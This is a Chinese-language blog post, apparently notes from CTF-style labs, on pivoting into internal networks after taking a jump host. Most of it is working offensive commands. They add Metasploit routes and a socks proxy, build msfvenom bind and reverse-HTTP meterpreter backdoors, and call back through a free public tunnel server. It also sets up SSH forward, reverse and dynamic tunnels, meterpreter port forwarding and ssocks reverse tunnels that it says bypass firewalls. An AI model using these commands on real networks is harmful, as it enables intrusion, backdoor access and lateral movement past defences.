内网穿透


1.msf内网穿透(跨路由)

msf拿到跳板机的shell后拿到flag1,便进入到meterpreter后渗透,进行内网信息收集——查看靶机上的内网路由地址,然后将其添加到本地代理中进行内网穿透。

meterpreter> run get_local_subnets  # 查看 跳板机的内网路由
			run autoroute -p   # 查看是否添加过路由信息
			run autoroute -s 192.168.22.0/24(内网路由)   #kali添加内网路由地址  
					或者 background后直接 use post/multi/manage/autoroute
									 run   来自动添加路由。
			background
#开启本地代理
use auxiliary/server/socks4a     #选择sockes4代理模块
set srvport 2222
exploit
#配置proxychains.conf
vim /etc/proxychains.conf
添加  socks4 192.168.21.128(kali) 2222
然后内网穿透代理就设置好了,下一步就可以直接扫内网中其他主机了
proxychains nmap -sT -Pn 192.168.22.0/24 -p 80  # 扫描出靶机2
漏洞利用之后蚁剑拿到shell,拿到flag2
然后上传一个正向代理的后门(因为靶机2已经是内网主机了,这时靶机2反向连接kali是连接不到的,但是由于kali配置了内网路由,所以正向连接可以连接到靶机2)
proxychains msfvenom -p linux/x64/meterpreter/bind_tcp lport=3333 -f elf > t2.elf  #生成正向连接的后门
proxychains msfconsole
	开启监听进入到meterpreter
然后再继续扫描出靶机2中能连接靶机3的路由地址,并添加到kali上
再找靶机3上的漏洞进行利用,拿到靶机3的shell
拿到flag3

2.Ngrok内网穿透(免费在线服务器)

Ngrok隧道目录下
./sunny.exe --server=free.idcfengye.com:4443 --key=213246308639   #开启隧道
做后门,让靶机反向连接Ngrok服务器
msfvenom -p linux/x64/meterpreter_reverse_http lhost=0x00dream.free.idcfengye.com lport=80 -f elf > houmen.elf
use exploit/multi/handler
set payload linux/x64/meterpreter_reverse_http   或  windows/meterpreter/reverse_http
set lhost 192.168.21.128
set lport 7777
exploit

3.ssh内网隧道

<1>正向连接

在跳板机上通过ssh做一个与内网另一台不连外网的机器的端口映射,然后攻击机就可以通过访问跳板机的6666端口来连接到内网中的另一台主机。

前提是还得知道跳板机的ssh用户密码

ssh -CNfL 0.0.0.0:6666:10.10.1.6:80 dayu@127.0.0.1  # 在跳板机上执行
#回环地址+端口+正向隧道地址+地址端口  +本地ssh登录地址
意思是:路由回环地址0+6666端口建立内网服务器80端口隧道,建立的中间条件是ssh访问协议。

<2>反向连接

在跳板机上执行,把本地的22端口映射到8888端口上,去ssh连接攻击机。

然后攻击机可以通过设跳板机的8888端口为代理去访问内网中其他主机。

ssh -qTfnN -R 8888:127.0.0.1:22  kali@192.168.175.145

<3>ssh开启sockes代理

在跳板机执行,去连接VPS,然后在攻击机设置sockes5代理为VPS的ip和端口,即可连接到内网中其他主机。

ssh -D <VPS端口> <VPSuser>@<VPSip>

4.MSF端口映射

meterpreter>portfwd list #查看端口映射列表
		   portfwd flush  #清空列表
		   portfwd add -L <kali-IP> -l <kali-port> -p <rport> -r <rhost>

然后就可以通过<kali-IP>去访问rhost的rport了。

5.socket隧道

Socket隧道比SSH隧道应用更广范,以及使用起来简单,该方法可以直接绕过防火墙设备进行进一步内网穿透。

下载地址:http://sourceforge.net/projects/ssocks/

攻击机和跳板机上都需要下载此工具。

下载后

tar zxvf ssocks-0.0.14.tar.gz  #解压
./configure && make		#进行编辑并生成文件
rcsocks:客户端       rssocks:服务端
./rcsocks -l 3333 -p 2222 -vv   #kali运行客户端,将3333和2222端口建立连接通道,等待远程Socks5服务器访问本地2222端口
./rssocks -s <kali-ip>:2222 -vv  # 跳板机运行服务端,去反向连接kali的2222端口
socket隧道建立完成
在kali的proxychains设置代理:socks5 127.0.0.1 2222

文章作者: 0x00dream
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 0x00dream !
  目录